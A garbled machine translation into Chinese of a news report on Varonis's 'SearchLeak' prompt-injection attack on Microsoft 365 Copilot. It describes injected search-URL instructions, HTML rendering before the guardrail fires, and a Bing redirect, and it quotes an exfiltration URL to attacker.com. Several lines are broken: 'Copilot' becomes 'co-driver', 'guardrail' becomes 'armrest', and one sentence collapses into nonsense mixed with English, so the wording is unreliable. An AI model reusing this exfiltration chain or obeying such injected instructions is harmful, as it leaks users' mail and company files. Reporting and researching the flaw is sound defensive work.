為了在提示中執行參數注入,攻擊者會向目標發送一封電子郵件,其中包含語法為 https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= 的 URL。該欄位包含說明。副駕駛爽快地答應了。
研究人員週一寫道:「搜尋功能正是攻擊者所需要的,因為即使功能有限,讓用戶能夠訪問重要資訊就足夠了。」「為了竊取數據,攻擊者創建了一個 URL,告訴 Copilot『搜尋用戶的電子郵件』、提取地址並將其嵌入到圖像 URL 中。」受害者什麼也沒寫。他們點擊一個鏈接,Copilot 完成剩下的工作。
一般情況下,扶手踢腳板是取出的 blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.
研究人員寫道:
因此,序列如下所示:
- 副駕駛開始廣播他的回應,其中包括: 符號
- 瀏覽器看到 它顯示它並向 src URL 發出 HTTP 請求
- 副駕駛完成產生包裹所有東西的扶手
- 太晚了!訂單已經離開了。
研究人員現在可以從目標瀏覽器發起圖像請求。如前所述,問題在於 Copilot 不會向大多數網站發送圖像請求。為了擴展這個護欄,漏洞利用鏈使用了微軟的 Bing 搜尋引擎作為一種彈跳床。根據 Copilot 的內容安全策略,Bing 是允許發送此類請求的網站之一。然後,Bing 會將請求傳送到請求中包含的攻擊者控制的網域。該請求如下所示:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
瓦羅尼斯將此攻擊命名為 SearchLeak。
該公司的研究人員寫道:「由於 SearchLeak 針對的是微軟的企業部門,因此爆炸的範圍不僅限於個人數據,它還能夠暴露用戶在組織內有權訪問的任何內容,包括電子郵件、會議邀請和筆記。」 “SharePoint 文件、OneDrive 文件和其他索引業務內容。根據 M365 與環境的連接方式,影響範圍可能會擴大。”
正如之前報導的那樣,微軟週二修復了 SearchLeak 利用的漏洞。由於沒有已知的方法來修復此類錯誤的根本原因,攻擊者將不可避免地找到新的方法來繞過新建的護欄,並且該過程將再次重複。
發布日期: 2026-06-16 12:15:00
來源連結: arstechnica.com
